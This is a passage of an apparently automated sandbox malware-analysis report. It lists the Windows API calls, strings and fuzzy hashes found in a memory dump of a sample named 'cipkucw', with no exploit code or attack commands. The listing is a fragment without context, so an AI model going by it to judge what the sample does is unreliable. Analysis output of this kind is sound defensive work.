                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007724E7
                                        • WSAGetLastError.WSOCK32 ref: 007724F1
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00786C41
                                        • ScreenToClient.USER32(?,?), ref: 00786C74
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00786CE1
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007660DD
                                        • GetLastError.KERNEL32(?,00000000), ref: 00766103
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00766128
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00766154
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0078204A
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • GetCaretPos.USER32(?), ref: 0078205E
                                        • ClientToScreen.USER32(00000000,?), ref: 007820AB
                                        • GetForegroundWindow.USER32 ref: 007820B1
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        APIs
                                          • Part of subcall function 006F4154: _wcslen.LIBCMT ref: 006F4159
                                        • _wcslen.LIBCMT ref: 0075E7F7
                                        • _wcslen.LIBCMT ref: 0075E80E
                                        • _wcslen.LIBCMT ref: 0075E839
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0075E844
                                        Similarity
                                        • API ID: _wcslen$ExtentPoint32Text
                                        • String ID:
                                        • API String ID: 3763101759-0
                                        APIs
                                          • Part of subcall function 0075960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?), ref: 0075961B
                                          • Part of subcall function 0075960C: lstrcpyW.KERNEL32(00000000,?,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 00759641
                                          • Part of subcall function 0075960C: lstrcmpiW.KERNEL32(00000000,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?), ref: 00759672
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 007581B2
                                        • lstrcpyW.KERNEL32(00000000,?,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 007581D8
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 00758213
                                        Strings
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0078866A
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00788689
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007886A1
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0076C10A,00000000), ref: 007886CA
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007522D7
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007522E9
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007522FF
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0075231A
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        APIs
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        • GetClientRect.USER32(?,?), ref: 0078A890
                                        • GetCursorPos.USER32(?), ref: 0078A89A
                                        • ScreenToClient.USER32(?,?), ref: 0078A8A5
                                        • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0078A8D9
                                        Similarity
                                        • API ID: Client$CursorLongProcRectScreenWindow
                                        • String ID:
                                        • API String ID: 4127811313-0
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0075EA29
                                        • MessageBoxW.USER32(?,?,?,?), ref: 0075EA5C
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0075EA72
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0075EA79
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00788792
                                        • ScreenToClient.USER32(?,?), ref: 007887AA
                                        • ScreenToClient.USER32(?,?), ref: 007887CE
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007887E9
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 006F216C
                                        • SetTextColor.GDI32(?,?), ref: 006F2176
                                        • SetBkMode.GDI32(?,00000001), ref: 006F2189
                                        • GetStockObject.GDI32(00000005), ref: 006F2191
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0074EBD6
                                        • GetDC.USER32(00000000), ref: 0074EBE0
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC00
                                        • ReleaseDC.USER32(?), ref: 0074EC21
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0074EBEA
                                        • GetDC.USER32(00000000), ref: 0074EBF4
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC00
                                        • ReleaseDC.USER32(?), ref: 0074EC21
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0071E69D
                                        Strings
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00784F7E
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00784F93
                                        Strings
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        APIs
                                          • Part of subcall function 006F771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F7759
                                          • Part of subcall function 006F771B: GetStockObject.GDI32(00000011), ref: 006F776D
                                          • Part of subcall function 006F771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F7777
                                        • GetWindowRect.USER32(00000000,?), ref: 007840D9
                                        • GetSysColor.USER32(00000012), ref: 007840F3
                                        Strings
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007525DC
                                        Strings
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 007524D6
                                        Strings
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00752558
                                        Strings
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00752663
                                        Strings
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007C4018,007C405C), ref: 00788B1E
                                        • CloseHandle.KERNEL32 ref: 00788B30
                                        Strings
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: \@|
                                        • API String ID: 3712363035-858619092
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782CCB
                                        • PostMessageW.USER32(00000000), ref: 00782CD2
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Strings
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782C8B
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00782C9E
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Strings
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 9aee13cc3fa746072fc52c9819bc8797f1f34f493a0dac6a10b0f2526d1a5cf4
                                        • Instruction ID: 2ebe4d31bac68b02865f61d0c95e6a484153f43edeab31bdae543d59db5d4922
                                        • Opcode Fuzzy Hash: 9aee13cc3fa746072fc52c9819bc8797f1f34f493a0dac6a10b0f2526d1a5cf4
                                        • Instruction Fuzzy Hash: F9D0A9353C4300B6E238B330DC0FFC62A01AB80B10F200812B249AA0C0C9E86800C788
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0072C233
                                        • GetLastError.KERNEL32 ref: 0072C241
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0072C29C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 427e094f8ca5e31ffffb0d4b885f21da9a5bff501f41e16623d7099697fee9d1
                                        • Instruction ID: 5b1a9a0e7289bb8ec243838d4a4ddb2d582d025a4d578bb0b9ec87e006b7da03
                                        • Opcode Fuzzy Hash: 427e094f8ca5e31ffffb0d4b885f21da9a5bff501f41e16623d7099697fee9d1
                                        • Instruction Fuzzy Hash: 0E41D931600226EFDB228FE8E844ABE7BF9FF65320F254169E855A71A1DF388D41C751